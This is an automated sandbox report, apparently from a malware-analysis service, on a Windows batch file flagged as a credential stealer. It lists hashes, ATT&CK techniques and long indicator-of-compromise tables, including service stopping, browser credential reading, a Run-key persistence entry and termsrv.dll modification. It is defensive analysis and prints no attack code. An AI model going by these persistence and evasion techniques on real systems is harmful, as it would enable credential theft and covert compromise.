c69d2404e2a9612e85dea8564bc995db41962603d4ea1530883cfa0f8e7b2a2f

Analysis

max time kernel
268s
max time network
270s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
13/11/2023, 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

3KB
MD5

9b1455a685a27c8a4f32d18949f69ad3
SHA1

6dc1bb5d2564b74d7c17825a8cb26b5b1cd073d7
SHA256

1a95ba631ec9a32c9e67492360ca5efb7f5018e9187058591dd0275dc09054ee
SHA512

6236d61a9da80622dd73cdfe25690a0dbd979e0bcd1a1d80c2e4f13afddc0e20ddb70ef7dc6ff6cb39d93f4cdae7acc4aa8897918590a2e68d980e52ddcd4d29

Score

8^/10

evasion persistence spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\de-DE\rdvgkmd.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\refs.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\volmgr.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\disk.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\ndisuio.sys.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\de-DE	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\wdf01000.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\wfplwfs.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\wof.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\fr-FR\hidscanner.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\urscx01000.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\vmbus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\IndirectKmd.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\tsusbflt.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\sermouse.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\en-US\SensorsHid.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\fr-FR\SensorsCx.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ks.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\TsUsbFlt.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\afd.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\dumpsd.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\kbdhid.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\raspppoe.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\sermouse.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\smbdirect.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\iorate.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\fltmgr.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\fvevol.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\Dmpusbstor.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\cxwmbclass.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\mountmgr.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\amdsata.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\volmgr.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\storqosflt.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\it-IT\UsbccidDriver.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc	attrib.exe
File opened for modification	C:\Windows\System32\drivers\lsi_sss.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\tdi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\pnpmem.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\bthport.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\i8042prt.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\srv2.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\bam.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\cht4dx64.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\cimfs.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\BTHUSB.SYS.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\USBHUB3.SYS.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\http.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\stexstor.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\storport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\storufs.sys	attrib.exe
File opened for modification	C:\Windows\SysWOW64\drivers\ja-JP	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\rdvgkmd.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\bthport.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\agilevpn.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\usbport.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\mrxsmb.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\rdbss.sys.mui	attrib.exe
File opened for modification	C:\Windows\System32\drivers\iaLPSSi_I2C.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rootmdm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\tcpipreg.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\wacompen.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\en-US\kbdhid.sys.mui	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe

Loads dropped DLL 3 IoCs

pid	Process
3352	Process not Found
3352	Process not Found
3352	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slimwin = "C:\\slimwin\\2.bat"	reg.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..l32-kf-programfiles_31bf3856ad364e35_10.0.19041.1_none_cb8c8caad1a2ad44\desktop.ini	attrib.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	attrib.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..l32-kf-userprofiles_31bf3856ad364e35_10.0.19041.1_none_39d6d106c6f70bec\desktop.ini	attrib.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	attrib.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..-kf-commonstartmenu_31bf3856ad364e35_10.0.19041.1_none_f6eee8789c1c6fdd\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	attrib.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	attrib.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3350690463-3549324357-1323838019-1000\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..-kf-programfilesx86_31bf3856ad364e35_10.0.19041.1_none_3870d3554f39ac78\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..2-kf-commonpictures_31bf3856ad364e35_10.0.19041.1_none_36436b821c9e7209\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..2-kf-commonprograms_31bf3856ad364e35_10.0.19041.1_none_047fa97bc9873117\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	attrib.exe
File opened for modification	C:\Windows\Downloaded Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-fontext_31bf3856ad364e35_10.0.19041.1_none_5476a60692fad199\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_11.0.19041.1_none_4b0e6b545bf0f4e7\desktop.ini	attrib.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	attrib.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	attrib.exe
File opened for modification	C:\Windows\Offline Web Pages\desktop.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	attrib.exe
File opened for modification	C:\Windows\Web\Wallpaper\Theme2\Desktop.ini	attrib.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	attrib.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	attrib.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..32-kf-commondesktop_31bf3856ad364e35_10.0.19041.1_none_a81a33274fb1b624\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ie-objectcontrolviewer_31bf3856ad364e35_11.0.19041.1_none_2108f0881e5a7a03\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-shell32-kf-public_31bf3856ad364e35_10.0.19041.1_none_0cf1a65e91dfb2be\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	attrib.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	attrib.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	attrib.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..ktopini-systemtools_31bf3856ad364e35_10.0.19041.1_none_345e4e1d2701732b\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	attrib.exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf	attrib.exe
File opened for modification	C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf	attrib.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Product-Data-EKB-Wrapper-Package~31bf3856ad364e35~amd64~~10.0.19041.1288.cat	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\it-IT\Netwew01.INF_loc	attrib.exe
File opened for modification	C:\Windows\System32\fr-FR\keymgr.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\netsstpa.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\smrdisk.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\en-US\wevtsvc.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\ja-jp\lpeula.rtf	attrib.exe
File opened for modification	C:\Windows\System32\ShiftJIS.uce	attrib.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\inseng.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\migwiz\dlmanifests\Microsoft.Windows.COM.ComPlus.Setup.DL.man	attrib.exe
File opened for modification	C:\Windows\System32\spp\tokens\skus\ProfessionalWorkstation\ProfessionalWorkstation-Retail-1-ul-phn-rtm.xrm-ms	attrib.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\it-IT\MSFT_WaitForAll.schema.mfl	attrib.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Schemas\PSMaml\hierarchy.xsd	attrib.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources	attrib.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\wuapi.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\MbaeApi.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\KBDURDU.DLL	attrib.exe
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ConfigCI-Onecore-Package~31bf3856ad364e35~amd64~ja-JP~10.0.19041.1.cat	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\c_computer.inf_amd64_aa72c8894a821b32	attrib.exe
File opened for modification	C:\Windows\System32\ja-jp\SensorService.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US	attrib.exe
File opened for modification	C:\Windows\System32\migwiz\replacementmanifests\WindowsPushNotifications-Platform-Library-Replacement.man	attrib.exe
File opened for modification	C:\Windows\SysWOW64\it-IT\onexui.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\es-ES	attrib.exe
File opened for modification	C:\Windows\System32\de-DE\pshed.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\en-US\lpr.exe.mui	attrib.exe
File opened for modification	C:\Windows\System32\fr-FR\netman.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\fr-FR\vdsbas.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoundation-LanguagePack-Package~31bf3856ad364e35~amd64~de-DE~10.0.19041.1.cat	attrib.exe
File opened for modification	C:\Windows\System32\MsDtc	attrib.exe
File opened for modification	C:\Windows\SysWOW64\acledit.dll	attrib.exe
File opened for modification	C:\Windows\System32\pl-PL\APHostRes.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\l3codecp.acm	attrib.exe
File opened for modification	C:\Windows\System32\RuntimeBroker.exe	attrib.exe
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Storage-VirtualDevice-IDE-merged-Package~31bf3856ad364e35~amd64~es-ES~10.0.19041.1.cat	attrib.exe
File opened for modification	C:\Windows\System32\de-DE\cewmdm.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\it-IT\fsquirt.exe.mui	attrib.exe
File opened for modification	C:\Windows\System32\migwiz\dlmanifests\Microsoft-Windows-DirectoryServices-ADAM-DL\adammigrate.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\en-US\PresentationHost.exe.mui	attrib.exe
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientCore-D-Opt-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\c_smrvolume.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\wbem\AutoRecover\16C850723D6D606824E3600992F717AC.mof	attrib.exe
File opened for modification	C:\Windows\System32\DiagSvcs	attrib.exe
File opened for modification	C:\Windows\System32\appvetwstreamingux.dll	attrib.exe
File opened for modification	C:\Windows\SysWOW64\net.exe	attrib.exe
File opened for modification	C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OneCore-Containers-Opt-Package~31bf3856ad364e35~amd64~~10.0.19041.264.cat	attrib.exe
File opened for modification	C:\Windows\System32\en-US\WinSyncMetastore.rll.mui	attrib.exe
File opened for modification	C:\Windows\System32\es-ES\dmdskres.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\ja-jp\msctf.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\Windows.ApplicationModel.Store.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\tsgenericusbdriver.inf_amd64_bcfa5f586783921d\TsUsbGDCoInstaller.dll	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\it-IT\pci.inf_loc	attrib.exe
File opened for modification	C:\Windows\System32\dot3hc.dll	attrib.exe
File opened for modification	C:\Windows\System32\shdocvw.dll	attrib.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\uaspstor.inf_amd64_63788a81c4c628c5\uaspstor.inf	attrib.exe
File opened for modification	C:\Windows\System32\en-US\ppcsnap.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\mcbuilder.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\bg-BG\comctl32.dll.mui	attrib.exe
File opened for modification	C:\Windows\SysWOW64\KBDNO1.DLL	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sysprint.sep	attrib.exe
File opened for modification	C:\Windows\System32\de-DE\QuickActionsDataModel.dll.mui	attrib.exe
File opened for modification	C:\Windows\System32\wbem\de-DE\mof.xsl	attrib.exe
File opened for modification	C:\Windows\System32\wbem\fr-FR\NetEventPacketCapture.mfl	attrib.exe

Modifies termsrv.dll 1 TTPs 1 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\System32\termsrv.dll	attrib.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\SourceAppService.winmd	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-96_contrast-white.png	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHKEY.DAT	attrib.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-100.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_altform-unplated_contrast-black.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.ReportDesign.Common.dll	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-96.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallLogo.scale-200_contrast-black.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr-2x.png	attrib.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Planet.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W4.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Tec.dll	attrib.exe
File opened for modification	C:\Program Files\Mozilla Firefox\mozavcodec.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\en-GB.pak	attrib.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\management\jmxremote.access	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libwave_plugin.dll	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-48_altform-lightunplated.png	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-runtime-l1-1-0.dll	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoSearchResults_180x160.svg	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mlp_plugin.dll	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp2.scale-200.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\WindowsFormsIntegration.resources.dll	attrib.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\policy	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\manifests\BuiltinAddCustomTags.xml	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_call_mobiles_landlines_v1.png	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\ui-strings.js	attrib.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2-2x.gif	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dll	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileLargeSquare.scale-200.png	attrib.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Marble.jpg	attrib.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms	attrib.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll	attrib.exe
